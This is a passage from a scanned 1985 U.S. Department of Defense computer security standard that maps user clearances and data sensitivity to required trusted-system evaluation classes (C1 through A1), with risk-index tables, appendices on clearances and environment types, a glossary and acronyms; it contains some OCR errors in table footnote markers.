         0              Dedicated                  No Prescribed
                                                    Minimum2
         0                  System High                C23
         1            Limited Access, Controlled,      B14
                      Compartmented, Multilevel
         2            Limited Access, Controlled,       B2
                      Compartmented, Multilevel
         3               Controlled, Multilevel         B3
         4              Multilevel                      A1
         5              Multilevel                      *
         6              Multilevel                      *
         7              Multilevel                      *

1 The asterisk (*) indicates that computer protection for environments with
that risk index are considered to be beyond the state of current technology.
Such environments must augment technical protection with personnel or
administrative security safeguards.

2 Although there is no prescribed minimum, the integrity and denial of service
requirements of many systems warrant at least class C1 protection.

3 If the system processes sensitive or classified data, at least a class C2
system is required.  If the system does not process sensitive or classified
data, a class C1 system is sufficient.

4 Where a system processes classified or compartmented data and some users do
not have at least a Confidential clearance, or when there are more than two
types of compartmented information being processed, at least a class B2 system
is required.
                              13

                            TABLE 5

 SECURITY INDEX MATRIX FOR OPEN SECURITY ENVIRONMENTS1

                Maximum Data Sensitivity

                          U     N     C     S     TS    1C    1M

                    U     C1    B1    B2    B3    *     *     *
     Minimum        N     C1    C2    B2    B2    A1    *     *
     Clearance or   C     C1    C2    C2    B1    B3    A1    *
     Author-
     ization        S     C1    C2    C2    C2    B2    B3    A1
     of System
     Users        TS(BI)  C1    C2    C2    C2    C2    B2    B3

                 TS(SBI)  C1    C2    C2    C2    C2    B1    B2
                   1C     C1    C2    C2    C2    C2    C22   B13
                   MC     C1    C2    C2    C2    C2    C22   C22

1 Environments for which either C1 or C2 is given are for systems that operate
in system high mode.  No minimum level of trust is prescribed for systems that
operate in dedicated mode.  Categories are ignored in the matrix, except for
their inclusion at the TS level.

2 It is assumed that all users are authorized access to all categories present
in the system.  If some users are not authorized for all categories, then a
class B1 system or higher is required.

3 Where there are more than two categories, at least a class B2 system is
required.

U = Uncleared or Unclassified
N = Not Cleared but Authorized Access to Sensitive Unclassified Information or
Not Classified but Sensitive
C = Confidential
S = Secret
TS = Top Secret
TS(BI) = Top Secret (Background Investigation)
TS(SBI) = Top Secret (Special Background Investigation)
1C = One Category
MC = Multiple Category
                                           14

In system high mode, all users have sufficent security clearances and category
authorizations for all data, but some users do not have a need-to-know for all
information in the system.(10) Systems that operate in system high mode thus
are relied on to protect information from users who do not have the appropriate
need-to-know. Where classified or sensitive unclassified data is involved, no
less than a class C2 system is allowable due to the need for individual
accountability.

In accordance with policy, individual accountability requires that individual
system users be uniquely identified and an automated audit trail kept of their
actions.  Class C2 systems are the lowest in the hierarchy of trusted systems
to provide individual accountability and are therefore required where sensitive
or classified data is involved.  The only case where no sensitive or classified
data is involved is the case in which the maximum sensitivity of data is
unclassified.  In this case, hardware and software controls are still required
to allow users to protect project or private information and to keep other
users from accidentally reading or destroying their data.  However, since there
is no officially sensitive data involved, individual accountability is not
required and a class C1 system suffices.  In system high mode sensitivity
labels are not required for making access control decisions.  In this mode
access is based on the need-to-know, which is based on permissions (e.g., group
A has access to file A), not on sensitivity labels.  The type of access control
used to provide need-to-know protection is called discretionary access control.
It is defined as a means of restricting access to objects based on the identity
of subjects and/or groups to which the subjects belong.  All systems above
Division D provide discretionary access control mechanisms.  These mechanisms
are more finely grained in class C2 systems than in Class C1 systems in that
they provide the capability of including or excluding access to the granularity
of a single user.  Division C systems (C1 and C2) do not possess the capability
to provide trusted labels on output.  Therefore, output from these systems must
be labeled at the system high level and manually reviewed by a responsible
individual to determine the correct sensitivity prior to release beyond the
perimeter of the system high protections of the system.(10)

Environments with a risk index of 1 or higher encompass systems operating in
controlled, compartmented, and multilevel modes.  These environments require
mandatory access control, which is the type of access control used to provide
protection based on sensitivity labels.  It is defined as a means of
restricting access to objects based on the sensitivity (as represented by a
label) of the information contained in the objects and the formal clearance or
authorization of subjects to access information of such sensitivity.  Division
B and A systems provide mandatory access control, and are therefore required
for all environments with risk indices of 1 or greater.

The need for internal labeling has a basis in policy, in that DoD Regulation
5200.1-R requires computer systems that process sensitive or classified data to
provide internal classification markings.(3) Other requirements also exist.

     Example: The DCID entitled "Security Controls on the Dissemination of
     Intelligence Information" requires that security control markings be
                                 15

     "associated (in full or abbreviated form) with data stored or processed in
     automatic data processing systems."(14)

Sensitivity labeling is also required for sensitive unclassified data.(15,16)

     Example: Data protected by Freedom of Information (FOI) Act exemptions
     must be labeled as being "exempt from mandatory disclosure under the FOI
     Act."(15)

This example illustrates not only the need for labeling but also the fact that
the purpose of FOI Act exemptions is to provide access control protection for
sensitive data.  In summary, it is a required administrative security practice
that classified and unclassified sensitive information be labeled and
controlled based on the labels.  It follows that prudent computer security
practice requires similar labeling and mandatory access control.

The minimum class recommended for environments requiring mandatory access
control is class B1, since class B1 systems are the lowest in the hierarchy of
trusted systems to provide mandatory access control.

     Example:  Where no categories are involved, systems with minimum
     clearance/maximum data sensitivity pairings of U/N and C/S have a risk
     index of 1 and thus require at least a class B1 system.

Some systems that operate in system high mode use mandatory access control for
added protection within the system high environment, even though the controls
are not relied upon to properly label and protect data passing out of the
system high environment.  There has also been a recommendation that mandatory
access controls (i.e., class B1 or higher systems) be used whenever data at two
or more sensitivity levels is being processed, even if everyone is fully
cleared, in order to reduce the likelihood of mixing data from files of higher
sensitivity with data of files of lower sensitivity and releasing the data at
the lower sensitivity.(17) These points reaffirm the fact that the classes
identified in the requirements are minimum values.

This report emphasizes that output from a system operating in system high mode
must be stamped with the sensitivity and category labels of the most sensitive
data in the system until the data is examined by a responsible individual and
its true sensitivity level and category are determined.  If a system can only
be trusted for system high operation, its labels cannot be assumed to
accurately reflect data sensitivity.  The use of division B or A systems does
not necessarily solve this problem.

     Example: Take the case of a system in an open security environment that
     processes data classified up to Secret and supports some users who have
     only Confidential clearances.  According to the requirements, such a
     situation represents a risk index of 1 and thus requires a class B1
     system.  Some of the reports produced by the system might be unclassified.
     Nevertheless, such a report cannot be forwarded to uncleared people until
     the report is examined and its contents determined to be unclassified.
     Without the existence of such a review, the recipient becomes an indirect
     user and the risk index becomes 3. A class B1 system no longer provides
                                      16

     adequate data protection. Therefore, even though the system is trusted to
     properly label and segregate Confidential and Secret data, it is not
     simultaneously trusted to properly label and segregate unclassified data.

Systems with a risk index of 2 require more trust than can be placed in a class
B1 system.  Where no categories are involved, class B2 systems are the minimum
required for minimum clearance/maximum data sensitivity pairings such as U/C,
N/S and S/TS, all of which have a risk index of 2.  Class B2 systems have
several characteristics that justify this increased trust:

     a.  The Trusted Computing Base (TCB) is carefully structured into
         protection-critical and nonprotection-critical elements.  The TCB
         interface is well defined, and the TCB design and implementation
         enable it to be subjected to more thorough testing and more complete
         review.

     b.  The TCB is based on a clearly defined and documented formal security
         policy model that requires the discretionary and mandatory access
         control enforcement found in class B1 systems to be extended to all
         subjects and objects in the system. That is, security rules are more
         rigorously defined and have a greater influence on system design.

     c.  Authentication mechanisms are strengthened, making it more difficult
         for a malicious user or malicious software to improperly intervene in
         the login process.

     d.  Stringent configuration management controls are imposed for life-cycle
         assurance.

     e.  Covert channels are addressed to defend against their exploitation by
         malicious software.(18) A covert channel is a communication channel
         that violates the system's security policy.

Because of these and other characteristics, class B2 systems are relatively
resistant to penetration.  A risk index of 3, however, requires greater
resistance to penetration.  Class B3 systems are highly resistant to
penetration and are the minimum required for situations with a risk index of 3
such as those with minimum clearance/maximum data sensitivity pairings of U/S,
C/TS, S/TS with one category, and TS(BI)/TS with multiple categories.
Characteristics that distinguish class B3 from class B2 systems include the
following:

     a.  The TCB must satisfy the reference monitor requirements that it
         mediate all accesses of subjects to objects, be tamperproof, and be
         small enough to be subjected to analysis and tests.  Much effort is
         thus spent on minimizing TCB complexity.

     b.  Enhancements are made to system audit mechanisms and system
         recovery procedures.

     c.  Security management functions are performed by a security
         administrator rather than a system administrator.
                              17

While several new features have been added to class B3 systems, the major
distinction between class B2 and class B3 systems is the increased trust that
can be placed in the TCB of a class B3 system.  The most trustworthy systems
defined by the Criteria are class Al systems.  Class Al systems can be used for
situations with a risk index of 4, such as the following minimum
clearance/maximum data sensitivity pairings: N/TS, C/TS with one category, and
S/TS with multiple categories.  Class Al systems are functionally equivalent to
those in class B3 in that no additional architectural features or policy
requirements are added.  The distinguishing characteristic of systems in this
class is the analysis derived from formal design specification and verification
techniques and the resulting high degree of assurance that the TCB is correctly
implemented.  In addition, more stringent configuration management is required
and procedures are established for securely distributing the system to sites.

The capability to support systems in open security environments with a risk
index of 5 or greater is considered to be beyond the state-of-the-art.  For
example, technology today does not provide adequate security protection for an
open environment with uncleared users and Top Secret data.  Such environments
must rely on physical, personnel, or information security solutions or on such
technical approaches as periods processing.
                             19

4.0 COMPUTER SECURITY REQUIREMENTS FOR CLOSED
    SECURITY ENVIRONMENTS

This section discusses the application of the Computer Security Requirements to
systems in closed security environments.  A closed security environment is one
in which system applications are adequately protected against the insertion of
malicious logic.  Appendix C describes the closed security environment in more
detail.  The main threat to the TCB from applications in this environment is
not malicious logic, but logic containing unintentional errors that might be
exploited for malicious purposes.  As system quality reaches class B2, the
threat from logic containing unintentional errors is substantially reduced.
This reduction permits the placement of increased trust in class B2 systems due
to (1) the increased attention that B2 systems give to the interface between
the application programs and the operating system, (2) the formation of a more
centralized TCB, and (3) the elimination of penetration flaws.  Nevertheless,
the evaluation class of B1 assigned for open security environments cannot be
reduced to a class C1 or C2 in closed security environments because of the
requirement for mandatory access controls.

Table 6 presents the minimum evaluation class identified in the Computer
Security Requirements for different risk indices in a closed security
environment.  The principal difference between the requirements for the open
and closed environments is that in closed environments class B2 systems are
trusted to provide sufficient protection for a greater risk index.  As a
result, environments are supportable that were not supportable in open
situations (e.g., uncleared user on a system processing Top Secret data).
Table 7 illustrates the requirements' impact on individual minimum
clearance/maximum data sensitivity pairings.
                                    20

                             TABLE 6

COMPUTER SECURITY      REQUIREMENTS FOR CLOSED SECURITY
                       ENVIRONMENTS

  RISK INDEX         SECURITY OPERATING       MINIMUM CRITERIA
                            MODE                   CLASS1

        0                  Dedicated             No Prescribed
                                                  Minimum 2
        0                 System High                C23
        1        Limited Access, Controlled,         B14
                 Compartmented, Multilevel
        2        Limited Access, Controlled          B2
                 Compartmented, Multilevel
        3              Controlled, Multilevel        B2
        4                  Multilevel                B3
        5                  Multilevel                A1
        6                  Multilevel                *
        7                  Multilevel                *

1 The asterisk (*) indicates that computer protection for environments with
that risk index are considered to be beyond the state of current technology.
Such environments must augment technical protection with physical, personnel,
and/or administrative safeguards.

2 Although there is no prescribed minimum, the integrity and denial of service
requirements of many systems warrant at least class C1 protection.

3 If the system processes sensitive or classified data, at least a class C2
system is required.  If the system does not process sensitive or classified
data, a class C1 system is sufficient.

-Where a system processes classified or compartmented data and some users do
not have at least a Confidential clearance, at least a class B2 system is
required.   
                                21

                             TABLE 7
      SECURITY INDEX MATRIX FOR CLOSED SECURITY ENVIRONMENTS1

                            Maximum Data Sensitivity

                        U     N     C     S     TS    1C    MC

                  U     C1    B1    B2    B2    A1    *     *
   Minimum        N     C1    C2    B1    B2    B3    A1    *
   Clearance or   C     C1    C2    C2    B1    B2    B3    A1
   Author-        S     C1    C2    C2    C2    B2    B2    B3
   ization      TS(BI)  C1    C2    C2    C2    C2    B2    B2
   of System   TS(SBI)  C1    C2    C2    C2    C2    B1    B2
   Users         1C     C1    C2    C2    C2    C2    C22   B13
                 MC     C1    C2    C2    C2    C2    C22   C22

1 Environments for which either C1 or C2 is given are for systems that operate
in system high mode.  There is no prescribed minimum level of trust for systems
that operate in dedicated mode.  Categories are ignored in the matrix, except
for their inclusion at the TS level.

2 It is assumed that all users are authorized access to all categories on the
system. If some users are not authorized for all categories, then a class B1
system or higher is required.

3 Where there are more than two categories, at least a class B2 system is
required.

U = Uncleared or Unclassified
N = Not Cleared but Authorized Access to Sensitive UnclassiFied Information or
Not Classified but Sensitive
C = Confidential
S = Secret
TS = Top Secret
TS(BI) = Top Secret (Background Investigation)
TS (SBI) = Top Secret (Special Background Investigation)
1C = One Category
MC = Multiple Categories
                                       23

                   APPENDIX A

          SUMMARY OF CRITERIA The DoD Trusted Computer System Evaluation
Criteria(4) provides a basis for specifying security requirements and a metric
with which to evaluate the degree of trust that can be placed in a computer
system.  These criteria are hierarchically ordered into a series of evaluation
classes where each class embodies an increasing amount of trust.  A summary of
each evaluation class is presented in this appendix.  This summary should not
be used in place of the Criteria.  The evaluation criteria are based on six
fundamental security requirements that deal with controlling access to
information.  These requirements can be summarized as follows:

   a. Security policy--There must be an explicit and well-defined security
      policy enforced by the system.

   b. Marking--Access control labels must be associated with objects.

   c. Identification--Individual subjects must be identified.

   d. Accountability--Audit information must be selectively kept and
      protected so that actions affecting security can be traced to the
      responsible party.

   e. Assurance--The computer system must contain hardware and software
      mechanisms that can be evaluated independently to provide sufficient
      assurance that the system enforces the security policy.

   f. Continuous protection--The trusted mechanisms that enforce the
      security policy must be protected continuously against tampering and
      unauthorized changes.

The evaluation criteria are divided into four divisions--D, C, B, and A;
divisions C, B, and A are further subdivided into classes.  Division D
represents minimal protection, and class A1 is the most trustworthy and
desirable from a computer security point of view.

The following overviews are excerpts from the Criteria:

   Division D: Minimal Protection. This division contains only one class. It is
reserved for those systems that have been evaluated but fail to meet the
requirements for a higher evaluation class.

   Division C: Discretionary Protection. Classes in this division provide for
discretionary (need-to-know) protection and accountability of subjects and the
actions they initiate, through inclusion of audit capabilities.
                               24

     Class C1: Discretionary Security Protection.  The TCB of class C1 systems
nominally satisfies the discretionary security requirements by providing
separation of users and data.  It incorporates some form of, credible controls
capable of enforcing access limitations on an individual basis, i.e.,
ostensibly suitable for allowing users to be able to protect project or private
information and to keep other users from accidentally reading or destroying
their data.  The class C I environment is expected to be one of cooperating
users processing data at the same level(s) of sensitivity.

     Class C2: Controlled Access Protection. Systems in this class enforce a
more finely grained discretionary access control than class C1 systems, making
users individually accountable for their actions through logic procedures,
auditing of security-relevant events, and resources encapsulation.

     Division B: Mandatory Protection.  The notion of a TCB that preserves the
integrity of sensitivity labels and uses them to enforce a set of mandatory
access control rules is a major requirement in this division.  Systems in this
division must carry the sensitivity labels with major data structures in the
system.  The system developer also provides the security policy model on which
the TCB is based and furnishes a specification of the TCB.  Evidence must be
provided to demonstrate that the reference monitor concept has been
implemented.

     Class B1: Labeled Security Protection. Class B1 systems require all the
features required for class C2. In addition, an informal statement of the
security policy model, data labeling, and mandatory access control over named
subjects and objects must be present. The capability must exist for accurately
labeling exported information. Any flaws identified by testing must be removed.

     Class B2: Structured Protection.  In class B2 systems, the TCB is based on
a clearly defined and documented formal security policy model that requires the
discretionary and mandatory access control enforcement found in B1 systems be
extended to all subjects and objects in the system.  In addition, covert
channels are addressed.  The TCB must be carefully structured into
protection-critical and nonprotection-critical elements.  The TCB interface is
well defined and the TCB design and implementation enable it to be subjected to
more thorough testing and more complete review.  Authentication mechanisms are
strengthened, trusted facility management is provided in the form of support
for systems administrator and operator functions, and stringent configuration
management controls are imposed.  The system is relatively resistant to
penetration.

     Class B3: Security Domains. The class B3 TCB must satisfy the reference
monitor requirements that it mediate all accesses of subjects to objects, be
tamperproof, and be small enough to be subjected to analysis and tests. To this
end, the TCB is structured to exclude code not essential to security policy
enforcement, with significant software engineering during TCB design and
implementation directed toward minimizing its complexity.  A security
administrator is supported, audit mechanisms are expanded to signal security-
relevant events, and system recovery procedures are required. The system is
highly resistant to penetration.

     Division A: Verified Protection. This division is characterized by the use
of formal security verification methods to assure that the mandatory and
                               25

discretionary security controls employed in the system can effectively protect
the classified and other sensitive information stored or processed by the
system.  Extensive documentation is required to demonstrate that the TCB meets
the security requirements in all aspects of design, development, and
implementation.

   Class A1: Verified Design.  Systems in class A1 are functionally equivalent
to those in class B3 in that no additional architectural features or policy
requirements have been added.  The distinguishing feature of systems in this
class is the analysis derived from formal design specification and verification
techniques and the resulting high degree of assurance that the TCB is correctly
implemented.  This assurance is developmental in nature starting with a formal
model of security policy and a formal top-level specification (FTLS) of the
design.  In keeping with the extensive design and development analysis of the
TCB required of systems in class A1, more stringent configuration management is
required and procedures are established for securely distributing the system to
sites.  A system security administrator is supported.
                                  27

                        APPENDIX B

DETAILED DESCRIPTION OF CLEARANCES AND DATA
               SENSITIVITIES
This appendix describes in detail the clearances and data sensitivities (e.g.,
classification) introduced in the body of the report.

B.1 Clearances

This section defines increasing levels of clearance or authorization of system
users. System users include not only those users with direct connections to the
system but also those users without direct connections who might receive output
or generate input that is not reliably reviewed for classification by a
responsible
individual.

   a. Uncleared (U)--Personnel with no clearance or authorization.
      Permitted access to any information for which there are no specified
      controls, such as openly published information.

   b. Unclassified Information (N)--Personnel who are authorized access to
      sensitive unclassified (e.g., For Official Use Only (FOUO)) information,
      either by an explicit official authorization or by an implicit
      authorization derived from official assignments or responsibilities.(15)

   c. Confidential Clearance (C)--Requires U.S. citizenship and typically
      some limited records checking.(19) In some cases, a National Agency
      Check (NAC) is required (e.g., for U.S. citizens employed by colleges or
      universities).(20)

   d. Secret Clearance (S)--Typically requires a NAC, which consists of
      searching the Federal Bureau of Investigation fingerprint and
      investigative files and the Defense Central Index of Investigations.(19)
      In some cases, further investigation is required.

   e. Top Secret Clearance based on a current Background Investigation
      (TS(BI))--Requires an investigation that consists of a NAC, personal
      contacts, record searches, and written inquiries. A B1 typically
      includes an investigation extending back 5 years, often with a spot
      check investigation extending back 15 years.(19)

   f. Top Secret Clearance based on a current Special Background
      Investigation (TS(SBI))--Requires an investigation that, in addition to
      the investigation for a B1, includes additional checks on the subject's
      immediate family (if foreign born) and spouse and neighborhood
      investigations to verify each of the subject's former residences in the
      United States where he resided six months or more. An SBI typically
      includes an investigation extending back 15 years.(19)
                                 28

     g. One category (1C)1 - In addition to a TS(SBI) clearance, written
        authorization for access to one category of information is required.
        Authorizations are the access rights granted to a user by a responsible
        individual (e.g., security officer).

    h.  Multiple categories (MC)' - In addition to TS(SBI) clearance, written
        authorization for access to multiple categories of information is
        required.

The extent of investigation required for a particular clearance varies based
both on the background of the individual under investigation and on derogatory
or questionable information disclosed during the investigation.  Identical
clearances are assumed to be equivalent, however, despite differences in the
amount of investigation peformed.

Individuals from non-DoD agencies might be issued DoD clearances if the
clearance obtained in their agency can be equated to a DoD clearance.  For
example, the "Q" and "L" clearances granted by both the Department of Energy
and the Nuclear Regulatory Commission are considered acceptable for issuance of
a DoD industrial personnel security clearance.(20) The "Q" clearance is
considered an authoritative basis for a DoD Top Secret clearance (based on a
B1) and the "L" clearance is considered an authoritative basis for a DoD Secret
clearance.(20)

Foreign individuals might be granted access to classified U.S.  information
although they do not have a U.S.  clearance.  Access to classified information
by foreign nationals, foreign governments, international organizations, and
immigrant aliens is addressed by National Disclosure Policy, DoD Directive
5230.11, and DoD Regulation 5200.I-R.(3,21,22) The minimum user clearance
rating table applies in such cases if the foreign clearance can be equated to
one of the clearance or authorization levels in the table.

B.2 Data Sensitivities

Increasing levels of data sensitivity are defined as follows:

     a. Unclassified (U)--Data that is not sensitive or classified:  publicly
        releasable information within a computer system. Note that such data
        might still require discretionary access controls to protect it from
        accidental destruction.

     b. Not Classified but Sensitive (N)--Unclassified but sensitive data. Much
        of this is FOUO data, which is that unclassified data that is exempt
        from release under the Freedom of Information Act.(15) This includes
        data such as the following:

        I.  Manuals for DoD investigators or auditors.

1 These are actually authorizations rather than clearance levels, but they are
included here to emphasize their importance.
                               29

     2. Examination questions and answers used in determination of the
        qualification of candidates for employment or promotion.

     3. Data that a statute specifically exempts from disclosure, such as
        Patent Secrecy data.(23)

     4. Data containing trade secrets or commercial or financial
        information.

     5. Data containing internal advice or recommendations that reflect
        the decision-making process of an agency.(24)

     6. Data in personnel, medical, or other files that, if disclosed, would
        result in an invasion of personal privacy.(25)

     7. Investigative records.

        DoD Directive 5400.7 prohibits any material other than that cited
        in FOI Act exemptions from being considered or marked
        FOUO.(15) One other form of unclassified sensitive data is that
        pertaining to unclassified technology with military application.(16)
        This refers primarily to documents that are controlled under the
        Scientific and Technical Information Program or acquired under
        the Defense Technical Data Management Program.(26,27) In
        addition to specific requirements for protection of particular forms
        of unclassified sensitive data, there are two general mandates. The
        first is Title 18, U.S. Code 1905, which makes it unlawful for any
        office or employee of the U.S. Government to disclose information
        of an official nature except as provided by law, including when such
        information is in the form of data handled by computer
        systems.(28) Official data is data that is owned by, produced by or
        for, or is under the control of the DoD. The second is Office of
        Management and Budget (OMB) Circular A-71, Transmittal
        Memorandum Number I, which establishes requirements for
        Federal agencies to protect sensitive data.(30)

c.   Confidential (C)--Applied to information, the unauthorized disclosure of
     which reasonably could be expected to cause damage to the national
     security.(3)

d.   Secret (S)--Applied to information, the unauthorized disclosure of which
     reasonably could be expected to cause serious damage to the national
     security.(3)

e.   Top Secret (TS)--Applied to information, the unauthorized disclosure of
     which reasonably could be expected to cause exceptionally grave
     damage to the national security.(3)
                                     30

     f.  One Category (1C)2--Applied to Top Secret Special Intelligence
        information (e.g., Sensitive Compartmented Information (SCI) or
        operational information (e.g., Single Integrated Operational
        Plan/Extremely Sensitive Information (SIOP/ESI)) that requires
        special controls for restrictive handling.(3) Access to such
        information requires authorization by the office responsible for the
        particular compartment.  Compartments also exist at the C and 5 levels
        (see the discussion below).

     g.  Multiple Categories (MC)2--Applied to Top Secret Special Intelligence
        or operational information that requires special controls for
        restrictive handling.  This sensitivity level differs from the 1C level
        only in that there are multiple compartments involved.  The number can
        vary from two to many, with corresponding increases in the risk
        involved.

Data sensitivity groupings are not limited to the hierarchical levels discussed
in Section B.2.  Nonhierarchical sensitivity categories such as NOFORN and
PROPIN are also used.(14) Compartmented information is also included under the
term sensitivity categories, as is information revealing sensitive intelligence
sources and methods.  Other sources of sensitivity categories include (a) the
Atomic Energy Act of 1954, (b) procedures based on International Treaty
requirements, and (c) programs for the collection of foreign intelligence or
under the jurisdiction of the National Foreign Intelligence Advisory Board or
the National Communications Security Subcommittee.(11,32,33,34,35) Such
nonhierarchical sensitivity categories can occur at each hierarchical
sensitivity level.

2 These are actually categories rather than classification levels.  They are
included here to emphasize their importance.
                                     31

                   APPENDIX C

          ENVIRONMENTAL TYPES The amount of computer security required in a
system depends not only on the risk index (Section 2) but also on the nature of
the environment.  The two environmental types of systems defined in this
document are based on whether the applications that are processed by the TCB
are adequately protected against the insertion of malicious logic.  A system
whose applications are not adequately protected is referred to as being in an
open environment.  If the applications are adequately protected, the system is
in a closed environment.  The presumption is that systems in open environments
are more likely to have malicious application than systems in closed
environments.  Most systems are in open environments.

Before defining the two environmental categories in more detail, it is
necessary to define several terms.

   a. Environment. The aggregate of external circumstances, conditions,
      and objects that affect the development, operation, and maintenance of
      a system.

   b. Application. Those portions of a system, including portions of the
      operating system, that are not responsible for enforcing the systems
      security policy.

   c. Malicious Logic. Hardware, software, or firmware that is intentionally
      included for the purpose of causing loss or harm (e.g., Trojan horses).

   d. Configuration Control. Management of changes made to a system's
      hardware, software, firmware, and documentation throughout the
      development and operational life of the system.

C.1 Open Security Environment

Based on these definitions, an open security environment includes those systems
in which either of the following conditions holds true:

   a. Application developers (including maintainers) do not have sufficient
      clearance (or authorization) to provide an acceptable presumption that
      they have not introduced malicious logic. Sufficient clearance is
      defined as follows: where the maximum classification of data to be
      processed is Confidential or below, developers are cleared and
      authorized to the same level as the most sensitive data; where the
      maximum classification of data to be processed is Secret or above,
      developers have at least a Secret clearance.

   b. Configuration control does not provide sufficient assurance that
      applications are protected against the introduction of malicious logic
      prior to or during the operation of system applications.
                                    32

Configuration control, by the broad definition above, encompasses all factors
associated with the management of changes to a system.  For example, it
includes the factor that the application's user interface might present a
sufficiently extensive set of user capabilities such that the user cannot be
prevented from entering malicious logic through the interface itself.

In an open security environment, the malicious application logic that is
assumed to be present can attack the TCB in two ways.  First, it can attempt to
thwart TCB controls and thereby "penetrate" the system.  Secondly, it can
exploit covert channels that might exist in the TCB.  This distinction is
important in understanding the threat and how it is addressed by the features
and assurances in the Criteria.

C.2 Closed Security Environment

A closed security environment includes those systems in which both of the
following conditions hold true:

     a. Applications developers (including maintainers) have sufficient
        clearances and authorizations to provide an acceptable presumption
        that they have not introduced malicious logic.

     b. Configuration control provides sufficient assurance that applications
        are protected against the introduction of malicious logic prior to and
        during the operation of system applications.

Clearances are required for assurance against malicious applications logic
because there are few other tools for assessing the security-relevant behavior
of application hardware and software.  On the other hand, several assurance
requirements from the Criteria help to provide confidence that the TCB does not
contain malicious logic.  These assurance requirements include extensive
functional testing, penetration testing, and correspondence mapping between a
security model and the design.  Application logic typically does not have such
stringent assurance requirements.  Indeed, typically it is not practical to
build all application software to the same standards of quality required for
security software.

The configuration control condition implicitly includes the requirement that
users be provided a sufficiently limited set of capabilities to pose an
acceptably low risk of entering malicious logic.  Examples of systems with such
restricted interfaces might include those that offer no data sharing services
and permit the user only to execute predefined processes that run on his
behalf, such as message handlers, transaction processors, and security
"filters" or "guards."
                                  33

                    GLOSSARY
For additional definitions, refer to the Glossary in the DoD Trusted Computer
System Evaluation Criteria.(4)

Application
   Those portions of a system, including portions of the operating system, that
   are not responsible for enforcing the security policy.

Category
   A grouping of classified or unclassified but sensitive information, to which
   an additional restrictive label is applied (e.g., proprietary, compartmented
   information).

Classification
   A determination that information requires, in the interest of national
   security, a specific degree of protection against unauthorized disclosure
   together with a designation signifying that such a determination has been
   made. (Adapted from DoD Regulation 5200.I-R.)(3) Data classification is
   used along with categories in the calculation of risk index.

Closed Security Environment
   An environment that includes those systems in which both of the following
   conditions hold true:

   a. Application developers (including maintainers) have sufficient
      clearances and authorizations to provide an acceptable presumption
      that they have not introduced malicious logic. Sufficient clearance is
      defined as follows: where the maximum classification of data to be
      processed is Confidential or below, developers are cleared and
      authorized to the same level as the most sensitive data; where the
      maximum classification of data to be processed is Secret or above,
      developers have at least a Secret clearance.

   b. Configuration control provides sufficient assurance that applications
      are protected against the introduction of malicious logic prior to and
      during operation of system applications.

Compartmented Information
   Any information for which the responsible Office of Primary Interest (OPI)
   requires an individual needing access to that information to possess a
   special authorization.

Configuration Control
   Management of changes made to a system's hardware, software, firmware,
   and documentation throughout the developmental and operational life of
   the system.

Covert Channel
   A communications channel that allows a process to transfer information in
   a manner that violates the system's security policy.(4)
                                34

Discretionary Access Control
   A means of restricting access to objects based on the identity of subjects
   and/or groups to which they belong. The controls are discretionary in the
   sense that a subject with a certain access permission is capable of passing
   that permission (perhaps indirectly) on to any other subject.(4)

Environment
   The aggregate of external circumstances, conditions, and objects that affect
   the development, operation, and maintenance of a system. (See Open
   Security Environment and Closed Security Environment.)

Label
   Apiece of information that represents the security level of an object and
   that describes the sensitivity of the information in the object.

Malicious Logic
   Hardware, software, or firmware that is intentionally included in a system
   for the purpose of causing loss or harm.

Mandatory Access Control
   A means of restricting access to objects based on the sensitivity (as
   represented by a label) of the information contained in the objects and the
   formal authorization (i.e., clearance) of subjects to access information of
   such sensitivity.(4)

Need-To-Know
   A determination made by the processor of sensitive information that a
   prospective recipient, in the interest of national security, has a
   requirement for access to, knowledge of, or possession of the sensitive
   information in order to perform official tasks or services.  (Adapted from
   DoD Regulation 5220.22-R.)(20)

Open Security Environment
   An environment that includes those systems in which one of the following
   conditions holds true:

   a. Application developers (including maintainers) do not have sufficient
      clearance or authorization to provide an acceptable presumption that
      they have not introduced malicious logic. (See the definition of Closed
      Security Environment for an explanation of sufficient clearance.)
   b. Configuration control does not provide sufficient assurance that
      applications are protected against the introduction of malicious logic
      prior to and during the operation of system applications.

Risk Index
   The disparity between the minimum clearance or authorization of system
   users and the maximum classification of data processed by the system.

Sensitive Information
   Information that, as determined by a competent authority, must be
   protected because its unauthorized disclosure, alteration, loss, or
                                 35

     destruction will at least cause perceivable damage to someone or
     something.(4)

System
     An assembly of computer hardware, software, and firmware configured for
     the purpose of classifying, sorting, calculating, computing, summarizing,
     transmitting and receiving, storing and retrieving data with a minimum of
     human intervention.

System Users
     Users with direct connections to the system and also those individuals
     without direct connections who receive output or generate input that is
     not reliably reviewed for classification by a responsible individual.  The
     clearance of system users is used in the calculation of the risk index.
                                   37

                     ACRONYMS
A1       An evaluation class requiring a verified design
ADP      Automated Data Processing
ADPS     Automated Data Processing System
AFSC     Air Force Systems Command

B1       An Evaluation class requiring labeled security protection
B2       An Evaluation class requiring structured protection
B3       An evaluation class requiring security domains
BI       Background Investigation

C        Confidential
C1       An evaluation class requiring discretionary access protection
C2       An evaluation class requiring controlled access protection
CI       Compartmented Information
CSC      Computer Security Center
COMINT   Communications Intelligence

DCI      Director of Central Intelligence
DCID     Director of Central Intelligence Directive
DIAM     Defense Intelligence Agency Manual
DIS      Defense Investigative Service
DoD      Department of Defense
DoDCSC   Department of Defense Computer Security Center

ESD      Electronic Systems Division

FOI      Freedom of Information
FOUO     For Official Use Only
FTLS     Formal Top-Level Specification

IEEE     Institute of Electrical and Electronics Engineers

L        A personnel security clearance granted by the Department of Energy
         and the Nuclear Regulatory Commission

MC       Multiple Compartments

N        Not Cleared but Authorized Access to Sensitive Unclassified
         Information or Not Classified but Sensitive
NAC      National Agency Check
NATO     North Atlantic Treaty Organization
NOFORN   Not Releasable to Foreign Nationals
NSA      National Security Agency
NSA/CSS  National Security Agency/Central Security Service
NTIS     National Technical Information Service

OMB      Office of Management and Budget
OPI      Office of Primary Interest
OPNAV    Office of the Chief of Naval Operations
OSD      Office of the Secretary of Defense

PRO PIN  Caution--Proprietary Information Involved
                              38

Q         A personnel security clearance granted by the Department of Energy
                   and the Nuclear Regulatory Commission

S         Secret
SBI       Special Background Investigation
SCI       Sensitive Compartmented Information
SIOP      Single Integrated Operational Plan
SIOP-ESI  Single Integrated Operational Plan--Extremely Sensitive Information
SM        Staff Memorandum
STD       Standard

TCB       Trusted Computing Base
TS        Top Secret

U         Uncleared or Unclassified
U.S.      United States

IC        One Compartment
                                  39

                   REFERENCES
1. DoD Computer Security Center, Computer Security Requirements --
   Guidance for Applying the Department of Defense Trusted Computer
   System Evaluation Criteria in Specific Environments, CSC-STD-003-85, 25
